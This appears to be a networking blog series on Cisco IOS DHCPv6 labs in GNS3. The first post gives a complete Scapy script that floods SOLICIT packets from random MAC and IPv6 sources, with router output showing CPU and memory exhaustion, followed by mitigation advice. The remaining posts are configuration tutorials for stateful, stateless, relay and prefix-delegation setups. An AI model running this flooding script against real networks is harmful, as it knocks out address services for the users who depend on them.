Fake DHCPv6 attack


DHCPv6 relies on stateless UDP communication using UDP 546 and UDP 547 ports. As stated in the RFC 3315 this makes DHCPv6 particularly vulnerable to fake attack, in which SOLICIT messages are generated with random source prefixes.

Using DHCPv6 Rapid-Commit mode, ONLY two messages are exchanged between the client and the server to get an IPv6 prefix.

Picture1: lab topology – IOS 12.4(24)T implemented in GNS3

DHCPv6 server configuration:

ipv6 dhcp pool SLAAC-POOL
address prefix 2001:DB8:5AB::/64 lifetime infinite infinite
dns-server 2001:DB8:5AB::57
domain-name nouri.com
!
interface FastEthernet1/0
ip address 192.168.0.202 255.255.255.0
ipv6 address 2001:DB8::202/64
ipv6 enable

ipv6 dhcp server pool0 rapid-commit
end

Layer2 Switch configuration:

interface FastEthernet1/0
switchport access vlan 10
!
interface FastEthernet1/1
switchport mode trunk

Below is the Scapy script used for the attack, though awkward, but do the job.

You can enter manually the DHCPv6 sever MAC address from the local neighbor table of through a script by pinging all DHCP agents multicast address FF02::1:2.

SOLCIT messages are sent blindly without even expecting any responses.

 

# -*- coding: utf-8 -*-
#! /usr/bin/env python
# DHCPv6 fake attack
# Date:     28/10/11
# Author:   AJ NOURI (cciethebeginning.wordpress.com)

from scapy.all import *
from netaddr import *
# or from netaddr.strategy.ipv6 import *
import random

class randmac():
""" Generates two forms of random MAC address
and corresponding Link Local EUI-64 IPv6 address"""
def __init__(self):
"""
Generates MAC address string by chunks of one byte
"""
random.seed()
self.mac11 = str(hex(random.randint(0,255))[2:])
self.mac12 = str(hex(random.randint(0,255))[2:])
self.mac21 = str(hex(random.randint(0,255))[2:])
self.mac22 = str(hex(random.randint(0,255))[2:])
self.mac31 = str(hex(random.randint(0,255))[2:])
self.mac32 = str(hex(random.randint(0,255))[2:])

def form1b(self):
""" format 1 XX:XX:XX:XX:XX:XX"""
self.rez1 =  self.mac11 + ":" +   self.mac12 + ":" +  self.mac21 + ":" +  self.mac22 + ":" +  self.mac31 + ":" +  self.mac32
return self.rez1

def form2b(self):
""" format 2 XXXX.XXXX.XXXX"""
self.rez2 =  self.mac11 +  self.mac12 + "." +  self.mac21 +   self.mac22 + "." +  self.mac31 +  self.mac32
return self.rez2

def eui64(self):
""" Generates interface ID in EUI-64 format"""
self.rez3 =  self.mac11 +  self.mac12 + ":" + self.mac21 + "ff" + ":" + "fe" +  self.mac22 + ":" +  self.mac31 + self.mac32
return self.rez3

def ip6_ll_eui64(self):
""" Generates Link-local  IPv6 addres in EUI-64 format"""
self.ip6_ll_eui64 = "fe80" + "::" + self.eui64()
return self.ip6_ll_eui64

def main():
# Building and initilizing DHCP SOLICIT packet layers with common parameters
l2 = Ether()
l3 = IPv6()
l4 = UDP()
sol = DHCP6_Solicit()
rc = DHCP6OptRapidCommit()
opreq = DHCP6OptOptReq()
et= DHCP6OptElapsedTime()
cid = DHCP6OptClientId()
iana = DHCP6OptIA_NA()
rc.optlen = 0
opreq.optlen = 4
iana.optlen = 12
iana.T1 = 0
iana.T2 = 0
cid.optlen = 10
""" DHCPv6 MAC address: you can enter manually or as argument to rthe script or get it automatically
""" by pinging DHCPv6 agent multicast ff02::1:2
macdst = "ca:00:39:b8:00:06"
l2.dst = macdst
l3.dst = "ff02::1:2"
l4.sport = 546
l4.dport = 547

#for i in range(1,1000):
while(1 == 1):
# Generating MAC and its corresponding IPv6 link-local in EUI-64 format
macs = randmac()
macsrc = macs.form1b()
ipv6llsrc = macs.ip6_ll_eui64()
# Initializaing the source addreses
l2.src = macsrc
l3.src = ipv6llsrc
random.seed()
# Generating SOLICIT message id
sol.trid = random.randint(0,16777215)
# Generating DUID-LL
cid.duid = ("00030001"+ str(EUI(macsrc)).replace("-","")).decode("hex")
# Assembing the packet
pkt = l2/l3/l4/sol/iana/rc/et/cid/opreq
try:
# GO!
sendp(pkt, iface='eth1')
except KeyboardInterrupt:
print 'Program Interrupted by user'
break

if __name__=="__main__":main()

Picture2: Fake DHCPv6 SOLICIT packets in Wireshark

Victim router:

R2#sh ipv6 dhcp pool
DHCPv6 pool: SLAAC-POOL
Address allocation prefix: 2001:DB8:5AB::/64 valid 4294967295 preferred 4294967295 (91725 in use, 0 conflicts)
DNS server: 2001:DB8:5AB::57
Domain name: nouri.com
Active clients: 91725
R2#

Look already at the number of fake active clients!

With a mask of /64 there are 18,446,744,073,709,551,616 hosts. Obviously the purpose is not to deplete the DHCPv6 prefixes; it will take a ridiculous amount of time to exhaust the pool. It is about CPU and memory resources exhaustion.

Resource consumption:

Baseline (before the attack):

During the attack:

Baseline (before the attack):

During the attack:

100% of interrupt processing caused by DHCPv6 and ND processes activities.

R2#sh proc cpu
CPU utilization for five seconds: 92%/100%; one minute: 87%; five minutes: 83%
PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process

OK, maybe the effect on CPU will not be so harmful with HW equipments, but each binding table association will take the same amount of memory.

Thirty minutes later, the 128 Mbytes of our DHCPv6 router memory is depleted and the router starts firing syslog messages to signal the problem.

Imagine what you can do with a more sophisticated piece of software or with HW tools like Ixia or Spirent.

Pool: Processor Free: 58968 Cause: Memory fragmentation
Alternate Pool: None Free: 0 Cause: No Alternate pool
-Process= “DHCPv6 Server“, ipl= 0, pid= 266, -Traceback= 0x6000A944z 0x600238C8z 0x63D60D6Cz 0x6220DB68z 0x622152E8z 0x62210170z 0x62210498z 0x62211128z 0x622112C8z 0x63079090z 0x63079074z
*Jan 21 19:46:24.669: %SYS-2-MALLOCFAIL: Memory allocation of 320 bytes failed from 0x6220DB60, alignment 0

Here more self-explanatory figures about the event:

Picture3: CPU utilization


Picture4: memory utilization


Though the DHCPv6 SOLLICIT messages consume insignificant BW, the harm is caused by the amount of memory allocated by each packet.


The Denial of Service involves the binding table associated to the DHCPv6 configuration pool

The DHCPv6 server maintains an automatic binding table in memory to track the assignment of some configuration parameters, such as prefixes between the server and its clients.
The binding table contains the records about all the prefixes in the configuration pool that have been explicitly delegated to clients. Each entry in the binding table contains the following information:

  • Client DUID
  • Client IPv6 address
  • A list of IAPDs associated with the client
  • A list of prefixes delegated to each IAPD
  • Preferred and valid lifetimes for each prefix
  • The configuration pool to which this binding table belongs

To clear the DHCPv6 router binding table:

R2#clear ipv6 dhcp bind *

Threat mitigation:

Here is a couple of threat mitigation tools you need to consider to mitigate the attack:

802.1x for layer2 authentication before even attending DHCPc6 process.

Secure ND (SeND): is a more complex architecture requiring crypto, SeND capable hosts and PKI infrastructure. At least an entire post will be dedicated to it.

ND related security can be used in the Layer2 switch connecting DHCPv6 clients:

  • IPv6 device tracking to make sure neighbour table contains only live hosts.
  • ND inspection: reject ND messages if MAC is unverifiable.
  • Depending on the expected number of IPv6 users, you can set ND cache limit globally or per interface basis.

References:

http://www.ietf.org/rfc/rfc3315.txt

http://www.ietf.org/id/draft-ietf-dhc-secure-dhcpv6-04.txt

http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-first_hop_security_ps6441_TSD_Products_Configuration_Guide_Chapter.html#wp1155200


Stateful DHCPv6 Prefix delegation (Rapid-commit) [4/4]


Picture1: DHCPv6 prefix delegation topology


R1 configuration [> 12.4(24) T]:

Prefix delegation gives the possibility to centrally control IPv6 addresses used in remote sites.

Router R1 acts as the primary DHCPv6 server for the client router R2, which in turn acts as DHCP server for final clients.

For example R1 can be a service provider MPLS PE (Provider Edge) router, R2 a client CPE (Customer Premise Equipment) router and final DHCP clients (router R3 in our case).

R1 controls which prefix pools to delegate to a remote router after matching the configured client DUID (in our case 00030001CA02188C0008) present in the SOLLICIT message received from the client.

R1:

ipv6 dhcp pool PDCONF


prefix-delegation 2001:DB8:23::/48 00030001CA02188C0008


dns-server 2001:DB8::57


domain-name nouri.com

The DHCPv6 server functionality is enabled on the interface fa0/0 facing R2, the intermediate server that will receive the delegated prefix 2001:DB8:23::/48.

interface FastEthernet0/0

ipv6 address 2001:DB8:12::1/64


ipv6 nd other-config-flag


ipv6 dhcp server PDCONF rapid-commit

R2 configuration [> 12.4(24) T]:

Router R2 interfacefa0/0, facing the DHCPv6 server R1, acts as DHCPv6 client

interface FastEthernet0/0

ipv6 address 2001:DB8:12::2/64

ipv6 enable


ipv6 dhcp client pd PDCONF rapid-commit

Router R2 interface fa0/1, facing the client R3, acts as a gateway router by announcing addresses from the delegated pool after assigning an interface ID to itself first, in this case (::2).

interface FastEthernet0/1


ipv6 address PDCONF ::2/64

ipv6 enable

And the client receives a prefix through SLAAC Router Advertisement.

R3:

interface FastEthernet0/0


ipv6 address autoconfig

ipv6 enable

R3(config-if)#do sh ipv6 interface brief

FastEthernet0/0 [up/up]

FE80::C800:1AFF:FECC:8


2001:DB8:23:0:C800:1AFF:FECC:8


R3(config-if)#

Verification:

R1 (Server):

R1#sh ipv6 dhcp pool

DHCPv6 pool: PDCONF

Static bindings:

Binding for client 00030001CA021FF80008

IA PD: IA ID not specified; being used by 00040001


Prefix: 2001:DB8:23::/48

preferred lifetime 604800, valid lifetime 2592000


DNS server: 2001:DB8::57


Domain name: nouri.com


Active clients: 1

R1#

The PDCONF pool is delegated to the client with the id=00030001CA021FF80008

R1#sh ipv6 dhcp interface

FastEthernet0/0 is in server mode

Using pool: PDCONF

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R1#

R2 (intermediate client/server) before delegation:

R2#sh ipv6 dhcp interface

FastEthernet0/0 is in client mode

Prefix State is SOLICIT (7)

Retransmission timer expires in 00:00:42

Address State is IDLE

Prefix Rapid-Commit: enabled

Address Rapid-Commit: disabled

FastEthernet0/1 is in server mode

Using pool: PDCONF

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

R2 (intermediate client/server) after delegation:

R2#sh ipv6 dhcp int

FastEthernet0/0 is in client mode


Prefix State is OPEN

Renew will be sent in 3d11h

Address State is IDLE

List of known servers:

Reachable via address: FE80::C803:CFF:FEBC:8


DUID: 00030001CA030CBC0008

Preference: 0

Configuration parameters:

IA PD: IA ID 0x00040001, T1 302400, T2 483840


Prefix: 2001:DB8:23::/48

preferred lifetime 604800, valid lifetime 2592000

expires at Dec 10 2011 02:58 AM (2591829 seconds)


DNS server: 2001:DB8::57


Domain name: nouri.com

Information refresh time: 0


Prefix name: PDCONF

Prefix Rapid-Commit: enabled

Address Rapid-Commit: disabled

FastEthernet0/1 is in server mode

Using pool: PDCONF

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

Picture2: DHCP SOLLICIT sent by R2 to R1

DHCPv6 server responding to R2 SOLLICIT

R1(config-dhcpv6)#

*Nov 10 02:58:18.579: IPv6 DHCP: Received SOLICIT from FE80::C802:1FFF:FEF8:8 on FastEthernet0/0

*Nov 10 02:58:18.583: IPv6 DHCP: Using interface pool PDCONF

*Nov 10 02:58:18.583: IPv6 DHCP: Creating binding for FE80::C802:1FFF:FEF8:8 in pool PDCONF

*Nov 10 02:58:18.583: IPv6 DHCP: Allocating IA_PD 00040001 in binding for FE80::C802:1FFF:FEF8:8

*Nov 10 02:58:18.587: IPv6 DHCP: Allocating prefix 2001:DB8:23::/48 in binding for FE80::C802:1FFF:FEF8:8, IAID 00040001

*Nov 10 02:58:18.591: IPv6 DHCP: Sending REPLY to FE80::C802:1FFF:FEF8:8 on FastEthernet0/0

R1(config-dhcpv6)#

Picture3: DHCP REPLY sent by R1 (the delegating server) to R2

About DUID (DHCP Unique Identifier)

DUID uniquely identifies the pair (client, server), it is based on the client and the server link-local address and the lowest numbered interface MAC.

DUID which remains the same across reboots.

rfc3315:

"DHCP clients use DUIDs to identify a server in messages where a server needs to be identified."
"The DUID is designed to be unique across all DHCP clients and servers, and stable for any specific client or 
server - that is, the DUID used by a client or server SHOULD NOT change over time if at all possible; for example,
a device's DUID should not change as a result of a change in the device's network hardware." 
"DUID is that the DUID must be globally unique"
... 
DUID Based on Link-layer Address [DUID-LL] 
3(2 octets)+ HW type(2 octets)+ LL(6 octets)

R1: DUID on DHCPv6 server role

R1#sh ipv6 dhcp

This device’s DHCPv6 unique identifier(DUID): 00030001CA030CBC0008

R1# sh ipv6 interface brief

FastEthernet0/0 [up/up]

FE80::C803:CFF:FEBC:8

2001:DB8:12::1


R1#

R2: DUID on DHCPv6 client/server role

R2#sh ipv6 dhcp

This device’s DHCPv6 unique identifier(DUID): 00030001CA021FF80008

R2#

R2#sh ipv6 interface brief

FastEthernet0/0 [up/up]

FE80::C802:1FFF:FEF8:8

2001:DB8:12::2


R2#

Stateful DHCPv6 Relay (Rapid-commit) [3/4]


Picture1: DHCPv6 relay topology


Server configuration [> 12.4(24) T]:

This configuration is useful in case your DHCP server is not in the same segment as DHCP clients.

R1 is the DHCP server, R2 is the DHCPv6 relay agent and R3 is used as a DHCP client.

R1:

ipv6 dhcp pool pool0


address prefix 2001:DB8::/64 lifetime infinite infinite


dns-server XXXX:YYYY:8B6B:90E0::57


dns-server 2001:DB8::57


domain-name nouri.com

interface FastEthernet0/0

no ip address

duplex full

speed 100

ipv6 address 2001:DB8:12::1/64

ipv6 nd other-config-flag


ipv6 dhcp server pool0 rapid-commit

end

R1#sh ipv6 dhcp pool

DHCPv6 pool: pool0

Address allocation prefix: 2001:DB8::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Active clients: 1

R1#

R1#sh ipv6 dhcp binding

Client: FE80::C800:62FF:FEB4:8

DUID: 00030001CA0062B40008

Username : unassigned

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8::90F4:41AD:A12A:EDD6

preferred lifetime INFINITY, , valid lifetime INFINITY,

R1#

R1#sh ipv6 dhcp interface fa0/0

FastEthernet0/0 is in server mode

Using pool: pool0

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R1#

DHCP Relay agent R2:

R2#sh ipv6 dhcp interface f0/1

FastEthernet0/1 is in relay mode

Relay destinations:


2001:DB8:12::1 via FastEthernet0/0

R2#

DHCPv6 Client R3:

R3#sh ipv6 dhcp interface fa0/0

FastEthernet0/0 is in client mode

Prefix State is IDLE

Address State is OPEN

Renew for address will be sent in 11:38:42

List of known servers:

Reachable via address: FE80::C802:51FF:FE48:6

DUID: 00030001CA0330500008

Preference: 0

Configuration parameters:

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8::90F4:41AD:A12A:EDD6/128

preferred lifetime INFINITY, valid lifetime INFINITY

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Information refresh time: 0

Prefix Rapid-Commit: disabled

Address Rapid-Commit: enabled

R3#

Picture2: Request from R2 (DHCPv6 Relay) to R1 (DHCPv6 server):

Picture3: Reply from R1 (DHCPv6 server) to R2 (DHCPv6 Relay):

Stateless DHCPv6 + SLAAC [2/4]


This is a common LAN Deployment model in which DHCPv6 is used to advertise DNS and domain name and IPv6 prefixes are assigned using classic SLAAC (Stateless Address Auto-Configuration).

(Server configuration [> 12.4(24) T])

ipv6 dhcp pool SLAAC-POOL

dns-server XXXX:YYYY:8B6B:90E0::57

dns-server 2001:DB8::57

domain-name nouri.com

!

interface FastEthernet0/1

ipv6 address 2001:DB8:23::2/64

ipv6 nd other-config-flag

ipv6 dhcp server SLAAC-POOL rapid-commit

end 

The Client gets the prefix from ND protocol (Network Discovery) through RS (Router Solicitation)/RA (Router Advertisement).

The Server sets a special flag in RA message to inform the client that it can get other stateful information like DNS and domain name through DHCP request.

Picture1: Stateless message exchange

Picture2: RA special flag

Client configuration [> 12.4(24) T]:

interface FastEthernet0/0

ipv6 address autoconfig

ipv6 enable

end 

 

Verification:

R3(config-if)#

*Oct 24 00:51:45.989: IPv6 DHCP: Sending INFORMATION-REQUEST to FF02::1:2 on FastEthernet0/0

*Oct 24 00:51:45.989: IPv6 DHCP: DHCPv6 changes state from IDLE to INFORMATION-REQUEST (STATELESS) on FastEthernet0/0

*Oct 24 00:51:46.001: IPv6 DHCP: Received REPLY from FE80::C803:37FF:FEAC:6 on FastEthernet0/0

*Oct 24 00:51:46.001: IPv6 DHCP: Adding server FE80::C803:37FF:FEAC:6

*Oct 24 00:51:46.005: IPv6 DHCP: Processing options

*Oct 24 00:51:46.005: IPv6 DHCP: Configuring DNS server XXXX:YYYY:8B6B:90E0::57

*Oct 24 00:51:46.005: IPv6 DHCP: Configuring DNS server 2001:DB8::57

*Oct 24 00:51:46.005: IPv6 DHCP: Configuring domain name nouri.com

*Oct 24 00:51:46.009: IPv6 DHCP: DHCPv6 changes state from INFORMATION-REQUEST to IDLE (REPLY_RECEIVED) on FastEthernet0/0

R3(config-if)# 

 

R3#ii6

FastEthernet0/0 [up/up]

FE80::C806:CFF:FE88:8


2001:DB8:23:0:C806:CFF:FE88:8

FastEthernet0/1 [up/up]

FE80::C806:CFF:FE88:6

2001:DB8::203

R3# 

R2 (Server) :

R2#sh ipv6 dhcp binding

R2#sh ipv6 dhcp data

R2#sh ipv6 dhcp interface

FastEthernet0/1 is in server mode

Using pool: SLAAC-POOL

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

R2#sh ipv6 dhcp pool

DHCPv6 pool: SLAAC-POOL

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Active clients: 0

R2# 

Note the DHCPv6 provides only DNS and domain name information, no IPv6 address assignment

Picture3: DHCP information request

Picture4: DHCP information reply

 

Picture5: ICMPv6 flow between DHCPv6 server and client interfaces:

IOS DHCPv6 deployment schemes


The following four posts are dedicated to DHCPv6 deployment. For the reasons I mentioned in the previous post, I used IOS version 12.4(24)T for all routers.

(XXXX:YYYY pattern in certain IPv6 addresses is used to hide a part of prefixes for privacy purpose)

Stateful DHCPv6 [1/4]

Rapid-commit

For this classic client-server DHCPv6 model, I deployed both modes rapid and normal commit.

Picture1: Stateful DHCPv6 rapid-commit topology

Server configuration [> 12.4(24) T]:

ipv6 unicast-routing

ipv6 dhcp pool pool23

address prefix 2001:DB8:23::/64 lifetime infinite infinite

dns-server XXXX:YYYY:8B6B:90E0::57

dns-server 2001:DB8::57

domain-name nouri.com

 

interface FastEthernet0/1

ipv6 address 2001:DB8:23::2/64

ipv6 dhcp server pool23 rapid-commit

 

R2(config-if)#do #do sh ipv6 int brief

FastEthernet0/0 [administratively down/down]

unassigned

FastEthernet0/1 [up/up]

FE80::C803:37FF:FEAC:62001:DB8:23::2

FastEthernet1/0 [administratively down/down]

unassigned

FastEthernet1/1 [administratively down/down]

unassigned

R2(config-if)#

Client configuration [> 12.4(24) T]:

ipv6 unicast-routing

!interface FastEthernet0/0

ipv6 address dhcp
rapid-commit

ipv6 enable

Make sure to explicitly enable IPv6 on the interface otherwise the interface will not send the SOLLICIT message as shown below:

R3(config-if)#

*Oct 23 00:41:58.363: IPv6 DHCP: IPv6 not ready on FastEthernet0/0, message not sent

With Rapid-Commit only 2 messages exchanged between the client and the server:

The Client asks for an address by sending SOLLICIT message and the Server responds with the address in REPLY message.

The other messages used in Normal-commit, the default mode, are used in an environment with redundant DHCPv6 servers so they are informed of the allocated addresses to avoid duplicate address assignment.

R3(config-if)#*Oct 23 00:43:13.179: IPv6 DHCP: Sending SOLICIT to FF02::1:2 on FastEthernet0/0
*Oct 23 00:43:13.287: IPv6 DHCP: Received REPLY from FE80::C803:37FF:FEAC:6 on FastEthernet0/0
*Oct 23 00:43:13.287: IPv6 DHCP: Adding server FE80::C803:37FF:FEAC:6*Oct 23 00:43:13.291: IPv6 DHCP: Processing options*Oct 23 00:43:13.291: IPv6 DHCP: Adding address 2001:DB8:23:0:70F8:B144:49B6:1FC8/128 to FastEthernet0/0*Oct 23 00:43:13.299: IPv6 DHCP: T1 set to expire in 43200 seconds*Oct 23 00:43:13.303: IPv6 DHCP: T2 set to expire in 69120 seconds

*Oct 23 00:43:13.303: IPv6 DHCP: Configuring DNS server XXXX:YYYY:8B6B:90E0::57

*Oct 23 00:43:13.303: IPv6 DHCP: Configuring DNS server 2001:DB8::57

*Oct 23 00:43:13.303: IPv6 DHCP: Configuring domain name nouri.com

*Oct 23 00:43:13.303: IPv6 DHCP: DHCPv6 address changes state from SOLICIT to OPEN (ADDR_REPLY_RECEIVED) on FastEthernet0/0

R3(config-if)#

Picture2: Rapid-Commit packet exchange

R3(config-if)#do show ipv6 int brief

FastEthernet0/0 [up/up]

FE80::C806:CFF:FE88:82001:DB8:23:0:70F8:B144:49B6:1FC8

FastEthernet0/1 [administratively down/down]

unassigned

R3(config-if)#

Verification:

DHCPv6 Server R2:

R2#sh ipv6 dhcp binding

Client: FE80::C806:CFF:FE88:8DUID: 00030001CA060C880008

Username : unassigned

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8:23:0:8A1:BD85:5F98:2321

preferred lifetime INFINITY, , valid lifetime INFINITY,

R2#

DHCP roles are configured per-interface

R2#sh ipv6 dhcp interface

FastEthernet0/1 is in server mode

Using pool: pool23

Preference value: 0

Hint from client: ignored

Rapid-Commit: enabled

R2#

After the assignment, the server is aware of the client.

R2#sh ipv6 dhcp pool

DHCPv6 pool: pool23

Address allocation prefix: 2001:DB8:23::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Active clients: 1

R2#

DHCPv6 Client R3:

 

R3#sh ipv6 dhcpThis device’s DHCPv6 unique identifier(DUID): 00030001CA060C880008R3#

 

R3#sh ipv6 dhcp interface

FastEthernet0/0 is in client modePrefix State is IDLEAddress State is OPEN

Renew for address will be sent in 10:18:52List of known servers:

Reachable via address: FE80::C803:37FF:FEAC:6

DUID: 00030001CA0337AC0008

Preference: 0

Configuration parameters:

IA NA: IA ID 0x00040001, T1 43200, T2 69120

Address: 2001:DB8:23:0:8A1:BD85:5F98:2321/128

preferred lifetime INFINITY, valid lifetime INFINITY

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Information refresh time: 0

Prefix Rapid-Commit: disabled

Address Rapid-Commit: enabled

R3#

The client is pointing a static route to the DHCP client interface, because it is a point-to-point segment, no next-hop is needed.

R3#ping ipv6 2001:DB8:23::2

Type escape sequence to abort.

Sending 5, 100-byte ICMP Echos to 2001:DB8:23::2, timeout is 2 seconds:

!!!!!

Success rate is 100 percent (5/5), round-trip min/avg/max = 8/22/44 msR3#

Normal-commit (default)

Picture3: Stateful DHCPv6 normal-commit topology

 

 

 

 

 

 

 

 

 

 

 

 

 

R2 (server):

interface FastEthernet0/1ipv6 address 2001:DB8:23::2/64

ipv6 dhcp server pool23

R3 (Client):

interface FastEthernet0/0ipv6 address dhcp

ipv6 enable

To enable Normal-commit, enough to omit the keyword “rapid-commit”

The ADVERTISE message proposes a prefix to the client and waits for a REQUEST message from this last (destined to all DHCP agents FF02::1:2).

This way, all DHCP servers will be informed of the new IPv6 address assignment.

R3 (client) debug ipv6 dhcp:

R3(config-if)#

*Oct 23 17:41:57.463: IPv6 DHCP: Sending SOLICIT to FF02::1:2on FastEthernet0/0*Oct 23 17:41:57.511: IPv6 DHCP: Received ADVERTISE from FE80::C803:37FF:FEAC:6on FastEthernet0/0*Oct 23 17:41:57.511: IPv6 DHCP: Adding server FE80::C803:37FF:FEAC:6*Oct 23

17:41:58.611: IPv6 DHCP: Sending REQUEST to FF02::1:2on FastEthernet0/0

*Oct 23 17:41:58.611: IPv6 DHCP: DHCPv6 address changes state from SOLICIT to REQUEST (ADDR_ADVERTISE_RECEIVED) on FastEthernet0/0

*Oct 23 17:41:58.655: IPv6 DHCP: Received REPLY from FE80::C803:37FF:FEAC:6on FastEthernet0/0

*Oct 23 17:41:58.655: IPv6 DHCP: Processing options

*Oct 23 17:41:58.655: IPv6 DHCP: Adding address 2001:DB8:23:0:9D54:7AB6:AC57:8230/128 to FastEthernet0/0

*Oct 23 17:41:58.663: IPv6 DHCP: T1 set to expire in 43200 seconds

*Oct 23 17:41:58.663: IPv6 DHCP: T2 set to expire in 69120 seconds

*Oct 23 17:41:58.663: IPv6 DHCP: Configuring DNS server XXXX:YYYY:8B6B:90E0::57

*Oct 23 17:41:58.667: IPv6 DHCP: Configuring DNS server 2001:DB8::57

*Oct 23 17:41:58.667: IPv6 DHCP: Configuring domain name nouri.com

*Oct 23 17:41:58.667: IPv6 DHCP: DHCPv6 address changes state from REQUEST to OPEN (ADDR_REPLY_RECEIVED) on FastEthernet0/0

R3(config-if)#

Picture4: Stateful DHCPv6 normal-commit message exchange

DHCPv6 address assignment


The immense address space provided by IPv6 engenders some challenges related to the management and the distribution of these 128-bit hexadecimal addresses. SLAAC or Stateless Auto Configuration is a good solution for small networks or separated segments, but such address distribution could not be appropriate for big networks where address assignment requires more control and management. Here comes DHPCv6 or Stateful Address Auto-configuration.

In this post I will try to share with you my experience with Cisco IOS implementation of DHCPv6 which became more mature with recent IOS versions.

Cisco IOS DHCPv6 prior to 12.4(24)T

As shown below It looks like IOS < 12.4(24)T do not support DHCPv6 IA (Identity Association) used by DHCPv6 clients to query and manage the type of IPv6 addresses (Temporary or Non-Temporary).

Picture: Example of DHCPv6 server reaction to Request containing IA (IOS 12.4(15) T8):

Picture: Linux dibbler-client with default option IA:

Only stateless DHCPv6 works by disabling the “ia” option in DHCPv6 dibbler-client.

######## After disabling IA option on dibbler-client with Cisco IOS < 12.4(24)T

user@debian:/etc/init.d$ sudo dibbler-client run
| Dibbler – a portable DHCPv6, version 0.7.3 (CLIENT, Linux port)

| Authors : Tomasz Mrugalski<thomson(at)klub.com.pl>,Marek Senderski<msend(at)o2.pl>

| Licence : GNU GPL v2 only. Developed at Gdansk University of Technology.

| Homepage: http://klub.com.pl/dhcpv6/


2011.12.23 16:03:51 Client Info Creating INFORMATION-REQUEST message on eth1/3 interface.

2011.12.23 16:03:52 Client Info Received REPLY on eth1/3,TransID=0x799f59, 4 opts: 2 1 23 24

2011.12.23 16:03:52 Client Notice Setting up DNS server 2001:db8:3000:3000::42 on interface eth1/3.

2011.12.23 16:03:52 Client Notice Setting up Domain example.com on interface eth1/3.

——

Before starting DHCPv6 configuration, I would like to mention a couple of definitions of some DHCPv6 concepts according to different sources:

– Identity association for non-temporary addresses (IA_NA): An IA that carries assigned addresses that are not temporary addresses

– Identity association for temporary addresses (IA_TA): An IA that carries temporary addresses (see RFC 3041).

– Temporary Addresses (TA) for DHCPv6 are Privacy Extensions for Stateless Address Auto configuration (SLAAC) and the primary purpose is to provides a level of privacy and protects against eavesdropping and spying transaction in hostile environments, but in an enterprise network it means difficulties for troubleshooting, attack trace back and monitoring

http://www.ietf.org/rfc/rfc3315.txt

DHCPv6 protocol is a stateful counterpart to "IPv6 Stateless Address Autoconfiguration" (RFC 2462)
 The Rapid Commit option is used to signal the use of the two message exchange for address assignment. 

http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-dhcp.html#wp1054059

Rapid Commit: The DHCPv6 client can obtain configuration parameters from a server either through a rapid two-message exchange (solicit, reply) or through a normal four-message exchange (solicit, advertise, request, reply). By default, the four-message exchange is used. When the rapid-commit option is enabled by both client and server, the two-message exchange is used.

The normal commit mode is useful when you have more than one DHCPv6 server and other servers need to be informed of any address assignment.

Dibbler documentation defines “stateful” and “stateless” slightly differently which could be confusing:

http://klub.com.pl/dhcpv6/doc/dibbler-user.pdf

stateful { it assumes that addresses (and possibly other parameters) are assigned to a client. To perform this kind of configuration, four messages are exchanged: SOLICIT, ADVERTISE, REQUEST and REPLY.stateless { when only parameters are configured (without assigning addresses to a client). During execution of this type of configuration, only two messages are exchanged: INF-REQUEST and REPLY.

For more information about DHCPv6 supported features in your IOS and device, refer to Feature Information for Implementing DHCP for IPv6  and Cisco Feature navigator

Lab Configuration using IOS 12.4(24)T:

Starting from IOS >12.4(24)T, IA(Identity Association) is supported with the command “address-prefix” under “ipv6 DHCP pool”

I used:

– IOS 12.4(24)T on GNS3 for DHCPv6 server and client modes.

– Three different devices as DHCPv6 clients: IOS router, Linux Debian and Windows Vista.

Picture: Lab topology

Cisco router DHCPv6 server

!
ipv6 unicast-routing

ipv6 cef

ipv6 dhcp pool pool1


address prefix 2001:DB8:1111::/64 lifetime infinite infinite

dns-server 2001:DB8:1201::1

domain-name domain1.com

!

ipv6 dhcp pool pool2


address prefix 2001:DB8:2222::/64 lifetime infinite infinite

dns-server 2001:DB8:1202::1

domain-name domain2.com

!

ipv6 dhcp pool pool3


address prefix 2001:DB8:3333::/64 lifetime infinite infinite

dns-server 2001:DB8:1203::1

domain-name domain3.com

Now you can configure interfaces with the server role to serve clients from the corresponding pool, don’t forget the “ipv6 nd managed-config-flag” to instruct the client via RA (Router Advertisement) to get their address through stateful auto configuration (DHCPv6).

interface FastEthernet0/0
ipv6 address 2001:DB8:1111::1/64

ipv6 enable

ipv6 nd managed-config-flag

ipv6 dhcp server pool1

!

interface FastEthernet0/1

ipv6 address 2001:DB8:2222::1/64

ipv6 enable

ipv6 nd managed-config-flag

ipv6 dhcp server pool2

!

interface FastEthernet1/0

ipv6 address 2001:DB8:3333::1/64

ipv6 enable

ipv6 nd managed-config-flag

ipv6 dhcp server pool3

DHCPv6#sh ipv6 dhcp
This device’s DHCPv6 unique identifier(DUID): 00030001CA0490380008

DHCPv6#

DHCPv6#sh ipv6 dhcp pool

DHCPv6 pool: pool1

Address allocation prefix: 2001:DB8:1111::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: 2001:DB8:1201::1

Domain name: domain1.com


Active clients: 1

DHCPv6 pool: pool2

Address allocation prefix: 2001:DB8:2222::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: 2001:DB8:1202::1

Domain name: domain2.com


Active clients: 1

